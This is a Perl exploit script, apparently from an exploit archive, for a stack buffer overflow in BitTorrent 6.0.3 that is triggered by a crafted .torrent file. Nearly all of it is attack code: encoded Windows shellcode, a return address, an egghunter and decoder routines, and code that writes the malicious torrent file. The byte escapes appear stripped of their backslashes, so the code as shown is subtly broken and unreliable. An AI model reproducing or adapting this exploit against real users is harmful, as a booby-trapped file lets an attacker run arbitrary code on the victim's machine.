Home / exploitsPDF  

bittorrent-overflow.txt

Posted on 21 October 2008

#!/usr/bin/perl
# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# 09/21/2008 by  k`sOSe && oVeret

use warnings;
use strict;

# If you change this(avoid x80->x9f unless you really know what you are doing) you must also change the length value of the decoder
my $shellcode =
#  windows/exec CMD="C:WINDOWSsystem32calc.exe"
#[*] x86/alpha_mixed succeeded, final size 337
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41" .
"x6bx41x41x51x32x41x42x32x42x42x30x42x42x41" .
"x42x58x50x38x41x42x75x4ax49x4bx4cx4bx58x51" .
"x54x43x30x45x50x45x50x4cx4bx51x55x47x4cx4c" .
"x4bx43x4cx45x55x44x38x43x31x4ax4fx4cx4bx50" .
"x4fx42x38x4cx4bx51x4fx47x50x43x31x4ax4bx51" .
"x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46x51x49" .
"x50x4ax39x4ex4cx4bx34x49x50x42x54x43x37x49" .
"x51x48x4ax44x4dx45x51x48x42x4ax4bx4cx34x47" .
"x4bx50x54x47x54x43x34x43x45x4dx35x4cx4bx51" .
"x4fx51x34x45x51x4ax4bx42x46x4cx4bx44x4cx50" .
"x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4bx45" .
"x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx46x44x45" .
"x54x48x43x51x4fx46x51x4bx46x45x30x46x36x45" .
"x34x4cx4bx47x36x50x30x4cx4bx51x50x44x4cx4c" .
"x4bx44x30x45x4cx4ex4dx4cx4bx45x38x45x58x4d" .
"x59x4bx48x4dx53x49x50x42x4ax50x50x45x38x4a" .
"x50x4cx4ax43x34x51x4fx45x38x4cx58x4bx4ex4c" .
"x4ax44x4ex50x57x4bx4fx4ax47x50x43x46x5ax51" .
"x4cx46x37x50x49x50x4ex51x54x50x4fx50x57x50" .
"x53x51x4cx42x53x43x49x44x33x44x34x45x35x42" .
"x4dx50x33x46x52x51x4cx42x43x43x51x42x4cx45" .
"x33x46x4ex43x55x42x58x42x45x43x30x44x4ax41" .
"x41";

$shellcode .= "x87x87"; # -> x21x20x21x20 -> EGG ( for english windows version )

my $ret	= "x3fx41"; # -> unicode friendly pop,pop,ret

# unicode friendly get_EIP (needed by the venetian decoder)
sub get_eip
{
#0041 00          ADD BYTE PTR DS:[ECX],AL
#5F               POP EDI
#0041 00          ADD BYTE PTR DS:[ECX],AL
#5F               POP EDI
#0041 00          ADD BYTE PTR DS:[ECX],AL
#6A 00            PUSH 0
#58               POP EAX
#0041 00          ADD BYTE PTR DS:[ECX],AL
#57               PUSH EDI
#0041 00          ADD BYTE PTR DS:[ECX],AL
#54               PUSH ESP
#0041 00          ADD BYTE PTR DS:[ECX],AL
#5A               POP EDX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#40               INC EAX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#43               INC EBX
#0042 00          ADD BYTE PTR DS:[EDX],AL
#58               POP EAX
#0041 00          ADD BYTE PTR DS:[ECX],AL
"x5fx41x5fx41x6ax58x41x57x41x54x41x5a" . "x42x40" x 12 . "x42x43" . "x42x58x41";
}


sub egghunter
{
#6A01		PUSH 1
#5E		POP ESI
#4E		DEC ESI (=0)
#6A72		PUSH 72				<- starts from 0x00720000
#56		PUSH ESI
#4C		DEC ESP
#4C		DEC ESP
#5E		POP ESI
#5E		POP ESI				<- ESI == 0x00720000
#BA21202120	/MOV EDX,20212021		<- egg
#46		|INC ESI
#3B16		|CMP EDX,DWORD PTR DS:[ESI]
#75FB		JNZ SHORT egghunter
"x6Ax01x5Ex4Ex6Ax72x56x4Cx4Cx5Ex5ExBAx21x20x21x20x46x3Bx16x75xFB";
}

# this will decode the unicode expanded shellcode pushing it to the stack and the execute it
sub decoder
{
#46		INC ESI
#6A01		PUSH 1
#6801010155	PUSH 0x55010101
#4C		DEC ESP
#5B		POP EBX
#5B		POP EBX
#AD		/LODS DWORD PTR DS:[ESI]
#50		|PUSH EAX
#44		|INC ESP
#44		|INC ESP
#44		|INC ESP
#4E		|DEC ESI
#4E		|DEC ESI
#4E		|DEC ESI
#4E		|DEC ESI
#4E		|DEC ESI
#4E		|DEC ESI
#4B		|DEC EBX
#83FB01		|CMP EBX,1
#75EF		JNE SHORT decoder
#54		PUSH ESP
#59		POP ECX
#4C		DEC ESP		-> realign
#51		PUSH ECX
#C3		RET
"x46x6Ax01x68x01x01x01x55x4Cx5Bx5BxADx50x44x44x44x4Ex4Ex4Ex4Ex4Ex4Ex4Bx83xFBx01x75xEFx54x59x4cx51xc3";
}

# venetian deccoder + venetian encoded egghunter and decoder
sub venetian_decoder
{
"x05x03x01x71x2Dx01x01x71x40x71xC6x01x71x40x71x40".
"x71xC6x4Ex71x40x71x40x71xC6x72x71x40x71x40x71xC6".
"x4Cx71x40x71x40x71xC6x5Ex71x40x71x40x71xC6xBAx71".
"x40x71x40x71xC6x20x71x40x71x40x71xC6x20x71x40x71".
"x40x71xC6x3Bx71x40x71x40x71xC6x75x71x40x71x40x71".
"xC6x46x71x40x71x40x71xC6x01x71x40x71x40x71xC6x01".
"x71x40x71x40x71xC6x01x71x40x71x40x71xC6x4Cx71x40".
"x71x40x71xC6x5Bx71x40x71x40x71xC6x50x71x40x71x40".
"x71xC6x44x71x40x71x40x71xC6x4Ex71x40x71x40x71xC6".
"x4Ex71x40x71x40x71xC6x4Ex71x40x71x40x71xC6x4Bx71".
"x40x71xFExFEx40x71xC6xFBx71x40x71x40x71xC6x75x71".
"x40x71x40x71xC6x54x71x40x71x40x71xC6x4Cx71x40x71".
"x40x71xC6xC3x71x40x71x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x6Ax5Ex6Ax56x4Cx5Ex21x21x46x16xFBx6Ax68x01x55x5B".
"xADx44x44x4Ex4Ex4Ex81x01xEFx59x51";
}

my $stack_buffer	= $ret x 192 . get_eip() . venetian_decoder();

open(HANDLE, "> torrent.torrent") || die "Error!

";
print HANDLE	"d8:announce17:http://qwerty.qwe7:comment" 	.
length($shellcode) .":" 			.
$shellcode .
"10:created by" 				.
length($stack_buffer) . ":"			.
$stack_buffer					.
"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:".
"x86xf7xe4x37xfaxa5xa7xfcxe1x5dx1dxdcxb9xeaxeaxeax37x76x67xb8x65x65x0a";
close (HANDLE);

 

TOP

Malware :

Exploits :